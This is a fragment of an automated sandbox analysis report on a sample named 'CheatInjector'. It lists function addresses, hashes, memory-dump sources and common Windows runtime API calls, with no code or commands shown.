                                                                • Opcode ID: 1ef91248672fb19fe3215499db0872343ec0ecae01ba043f68f30ba38e31dbdd
                                                                • Instruction ID: 64ec2386a2bc276dc790ab84b8e857c8ad9f7b1f1844ba7b38593e8498a4b604
                                                                • Opcode Fuzzy Hash: 1ef91248672fb19fe3215499db0872343ec0ecae01ba043f68f30ba38e31dbdd
                                                                • Instruction Fuzzy Hash: D481F7702087818FF3258B3684657B3BFE2AF63304F18895DD5E74B282D779A4498B66
                                                                Function 0051E50B Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: |eqz$|n =
                                                                • API String ID: 0-306079729
                                                                • Opcode ID: 653651000700ac2db79eca9c2e8e8a69f3c457e6ff79f48e7e93ea65c741f628
                                                                • Instruction ID: 9a03c5bae97b6c678030db1b08828fde682103395edcf7aea00b2a51a464babb
                                                                • Opcode Fuzzy Hash: 653651000700ac2db79eca9c2e8e8a69f3c457e6ff79f48e7e93ea65c741f628
                                                                • Instruction Fuzzy Hash: F281F6B02087818FF3258B3584A57F3BFE2AF63304F18495DD5E74B282D77964498B66
                                                                Function 0051E4FB Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: |eqz$|n =
                                                                • API String ID: 0-306079729
                                                                • Opcode ID: e623fc80caa825b8e3c70820dcb3b6cb8d62c92e6734ba15f72694ddc1ad731c
                                                                • Instruction ID: 13c1a9d951868665a085692bc16262dece40c7a4963a40010faa253a29c61c67
                                                                • Opcode Fuzzy Hash: e623fc80caa825b8e3c70820dcb3b6cb8d62c92e6734ba15f72694ddc1ad731c
                                                                • Instruction Fuzzy Hash: 5E61D6A02087808FF3258F3684617B3BFE2AF63304F58589DD5E74B282D3796409CB66
                                                                Function 004D4E13 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004D4E0E,?,?,00000008,?,?,004E34B0,00000000), ref: 004D5040
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise
                                                                • String ID:
                                                                • API String ID: 3997070919-0
                                                                • Opcode ID: ced8fdb40387366b4f72da650ff431472431460851a5eafae2df88e76e9788f1
                                                                • Instruction ID: 42b6f487a633ba0e500404273b44122224dcde58e4029e1311546743c7012653
                                                                • Opcode Fuzzy Hash: ced8fdb40387366b4f72da650ff431472431460851a5eafae2df88e76e9788f1
                                                                • Instruction Fuzzy Hash: 55B12931210609DFDB15CF28C496B657BA0FF85364F25865EE89ACF3A1C739E982CB44
                                                                Function 004C710C Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004C7122
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID:
                                                                • API String ID: 2325560087-0
                                                                • Opcode ID: 4a542b2a255ec03627eabb84b2fb11f6a95ee3f555753effe9753c60b736e020
                                                                • Instruction ID: a503952fa401724c707c818eacd9e6754cd8cee0dddd33a5621bb4bf000812ee
                                                                • Opcode Fuzzy Hash: 4a542b2a255ec03627eabb84b2fb11f6a95ee3f555753effe9753c60b736e020
                                                                • Instruction Fuzzy Hash: EFA1AFBDA096158FDB18CF54D88279EBBB0FB59318F98812EE409E7360C3789944DF54
                                                                Function 0051D470 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: "
                                                                • API String ID: 0-123907689
                                                                • Opcode ID: bcdfb5899803a8d31166921e0a83ab883810394956c3f1c4486351b5a6084011
                                                                • Instruction ID: 05d22a06be08ca1e3759e9845cdeff11d2b52c62f990ecc3af2904d9320ae835
                                                                • Opcode Fuzzy Hash: bcdfb5899803a8d31166921e0a83ab883810394956c3f1c4486351b5a6084011
                                                                • Instruction Fuzzy Hash: BBD106B2A083155BE725CE24C4847ABBFF5BB85350F19892DE89987381D738DD84C7A2
                                                                Function 004C4C86 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _Deallocate.LIBCONCRT ref: 004C4D85
                                                                  • Part of subcall function 004C1575: __EH_prolog3_catch.LIBCMT ref: 004C157C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: DeallocateH_prolog3_catch
                                                                • String ID:
                                                                • API String ID: 20358830-0
                                                                • Opcode ID: 1259a632854400b49a73bcec638d3fa7b942d7430f7cf9f3076f185556a175c7
                                                                • Instruction ID: 8465a6d751536bdefca648df425cabc77a06f80be7b806da3c0b80259781f5f0
                                                                • Opcode Fuzzy Hash: 1259a632854400b49a73bcec638d3fa7b942d7430f7cf9f3076f185556a175c7
                                                                • Instruction Fuzzy Hash: 1D4167755193529FC384DF69898091BBBE8FBC9714F440A2EF980DB350E379DA018B9A
                                                                Function 004DE1A7 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004D4200: GetLastError.KERNEL32(?,00000008,004D9825,00000000,004CB670), ref: 004D4204
                                                                  • Part of subcall function 004D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 004D42A6
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004DE1FB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocale
                                                                • String ID:
                                                                • API String ID: 3736152602-0
                                                                • Opcode ID: 0cafcd7ba60090b46e2a5ae7aa1706b12c6c4862d275bd0d12efadbb5f3e8c47
                                                                • Instruction ID: 67161c586d10f4dadd022aca0afdcd6ed109ea5c031a80074ab09e75554d90a6
                                                                • Opcode Fuzzy Hash: 0cafcd7ba60090b46e2a5ae7aa1706b12c6c4862d275bd0d12efadbb5f3e8c47
                                                                • Instruction Fuzzy Hash: 9121B332614206ABDB28AA26DC66A7B73ACEF44314B1001BFF905DA341EB78ED448658
                                                                Function 004FF83D Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ZABC
                                                                • API String ID: 0-3644254848
                                                                • Opcode ID: 83bdf03feb03246d4d2fcd5988bc9d5797200867bbc767e7c5725f10e7de4a4e
                                                                • Instruction ID: cdae295fb19636f752bf17d37ec94f11281accc1e395fa996b296b0c100dfe9b
                                                                • Opcode Fuzzy Hash: 83bdf03feb03246d4d2fcd5988bc9d5797200867bbc767e7c5725f10e7de4a4e
                                                                • Instruction Fuzzy Hash: 3AA1CBB454C3D08AE7318F2584947EBBFE1AFA3304F1849ADC0D85B252CB79410ACB96
                                                                Function 004CE821 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0
                                                                • API String ID: 0-4108050209
                                                                • Opcode ID: c1ef2824fed04bef52c900708f617d8dcf4b2fd50076ca47b81ef54c299b3b74
                                                                • Instruction ID: 8d48b2436dadc244328432c4ca86403fc436ab72033943da206e029b25d35dbc
                                                                • Opcode Fuzzy Hash: c1ef2824fed04bef52c900708f617d8dcf4b2fd50076ca47b81ef54c299b3b74
                                                                • Instruction Fuzzy Hash: 9DB1E47890060A8BCBA8DE67C491FBFB7A1AF01304F14061FE55297391D73DAD46CB59
                                                                Function 004DDE2E Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004D4200: GetLastError.KERNEL32(?,00000008,004D9825,00000000,004CB670), ref: 004D4204
                                                                  • Part of subcall function 004D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 004D42A6
                                                                • EnumSystemLocalesW.KERNEL32(004DDF54,00000001,00000000,?,-00000050,?,004DE585,00000000,?,?,?,00000055,?), ref: 004DDEA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2417226690-0
                                                                • Opcode ID: 47dd2bdb81e4953f6a2d0bbc06f5b73a6ccc53ea955bf5984c25ade71ddec6f7
                                                                • Instruction ID: 61c67fbedc7c549166a72801f919f7266d0425df95886ce7285685335b64c525
                                                                • Opcode Fuzzy Hash: 47dd2bdb81e4953f6a2d0bbc06f5b73a6ccc53ea955bf5984c25ade71ddec6f7
                                                                • Instruction Fuzzy Hash: EB11C63A6007055FDF189F39D8A15BAB791FB80359B14482FE5478BB40D375A942C744
                                                                Function 0050C995 Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: KJUT
                                                                • API String ID: 0-3147183306
                                                                • Opcode ID: eac0c4902d1a37aedbd69d1e695798224600fdad7127d96ca88aa8851b15651a
                                                                • Instruction ID: 02aca8c9ee04ed95123d8211cf2f0d836fd7a988a6b1511cdce1b4645631fbbb
                                                                • Opcode Fuzzy Hash: eac0c4902d1a37aedbd69d1e695798224600fdad7127d96ca88aa8851b15651a
                                                                • Instruction Fuzzy Hash: 6991A3362007018FD725CF26D8C5A7ABBA3FBAA310B69C62DD09747A66C734EC45DB10
                                                                Function 004DE3D6 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004D4200: GetLastError.KERNEL32(?,00000008,004D9825,00000000,004CB670), ref: 004D4204
                                                                  • Part of subcall function 004D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 004D42A6
                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004DE170,00000000,00000000,?), ref: 004DE402
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocale
                                                                • String ID:
                                                                • API String ID: 3736152602-0
                                                                • Opcode ID: 28a25a2d44a49dc42cc6b4c888eb0104d6d01318accce9253bc003d6c54b4f66
                                                                • Instruction ID: 0252d049dbc9c03dbec4481d57b1ac0f56ed7075e766a1c8b99227b2ad1cdabf
                                                                • Opcode Fuzzy Hash: 28a25a2d44a49dc42cc6b4c888eb0104d6d01318accce9253bc003d6c54b4f66
                                                                • Instruction Fuzzy Hash: BDF02D32A40215BBDF246B66CC25BBF7758DB40358F55483BED06A7380DA78FD41C594
                                                                Function 004DDEC9 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004D4200: GetLastError.KERNEL32(?,00000008,004D9825,00000000,004CB670), ref: 004D4204
                                                                  • Part of subcall function 004D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 004D42A6
                                                                • EnumSystemLocalesW.KERNEL32(004DE1A7,00000001,?,?,-00000050,?,004DE549,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004DDF13
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2417226690-0
                                                                • Opcode ID: f4dbf270f07dc5f9d860133b34a3c1379ddcab44ceddd11c88029c59858e0822
                                                                • Instruction ID: 96923578720f13309c93e75fc147ecd159592ad4cd13322720c40aadf373ad4f
                                                                • Opcode Fuzzy Hash: f4dbf270f07dc5f9d860133b34a3c1379ddcab44ceddd11c88029c59858e0822
                                                                • Instruction Fuzzy Hash: C8F0F6367043045FDB245F369C91A7B7BD5EF8036CB15452FFA068B780D6B5AC02CA58
                                                                Function 004D54FD Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004CF8B0: EnterCriticalSection.KERNEL32(?,?,004D3ED8,?,004ED8D0,00000008,004D409C,?,?,?), ref: 004CF8BF
                                                                • EnumSystemLocalesW.KERNEL32(Function_000154F0,00000001,004ED970,0000000C,004D58C2,?), ref: 004D5535
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                • String ID:
                                                                • API String ID: 1272433827-0
                                                                • Opcode ID: 030f8dcfe537a83d6b7f6b3e1ea4cd09613acd340ebba0af2fc5e2ea2520c11e
                                                                • Instruction ID: 9c615630168b9cdd5545a64d72ae8f12913c5dec3f67e20a85c33033769d4ec3
                                                                • Opcode Fuzzy Hash: 030f8dcfe537a83d6b7f6b3e1ea4cd09613acd340ebba0af2fc5e2ea2520c11e
                                                                • Instruction Fuzzy Hash: 30F04F7AA00204EFDB00EF59E842B9D77F0EB45729F10402BF5159B3A1CBB95A549F88
                                                                Function 004DDDE3 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004D4200: GetLastError.KERNEL32(?,00000008,004D9825,00000000,004CB670), ref: 004D4204
                                                                  • Part of subcall function 004D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 004D42A6
                                                                • EnumSystemLocalesW.KERNEL32(004DDD3C,00000001,?,?,?,004DE5A7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004DDE1A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2417226690-0
                                                                • Opcode ID: d73f1221c6441f95d64a6ce0a1365617118fa663cb55d6d0788bd76a8415d37a
                                                                • Instruction ID: ae9bd0e872c2ff5b3ab73aa3b76f65b0874faea4ea0ed3519ec480146b2b0f14
                                                                • Opcode Fuzzy Hash: d73f1221c6441f95d64a6ce0a1365617118fa663cb55d6d0788bd76a8415d37a
                                                                • Instruction Fuzzy Hash: FBF0553A70020457CF049F3AE86566B7F91EFC1720B06406BEB058B341C2399843C798
                                                                Function 004C790C Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00007918,004C6CF7), ref: 004C7911
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 2e959db66a24347f50e2003e8143243603daf8fb9fefca4cfd0eec2ccdb7a6ca
                                                                • Instruction ID: f8a0ad4bed88c31a32aa8483ebb2fc6eedbcf6672a7f6b415393e5b7996c064c
                                                                • Opcode Fuzzy Hash: 2e959db66a24347f50e2003e8143243603daf8fb9fefca4cfd0eec2ccdb7a6ca
                                                                • Instruction Fuzzy Hash:
                                                                Function 004F9100 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
